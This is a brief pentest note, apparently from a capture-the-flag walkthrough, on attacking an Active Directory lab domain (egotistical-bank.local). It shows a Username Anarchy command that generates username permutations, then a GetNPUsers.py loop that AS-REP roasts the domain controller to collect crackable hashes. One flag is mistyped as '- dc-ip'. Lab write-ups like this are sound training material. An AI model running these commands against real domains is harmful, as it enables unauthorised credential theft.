Last updated 6 months ago
We can use a tool such as Username Anarchy to create common username permutations based on the full names
./username-anarchy --input-file fullnames.txt --select-format first,flast,first.last,firstl > unames.txt
Try to ASREPRoasting attack
while read p; do GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass - dc-ip 10.10.10.175 >> hash.txt; done < unames.txt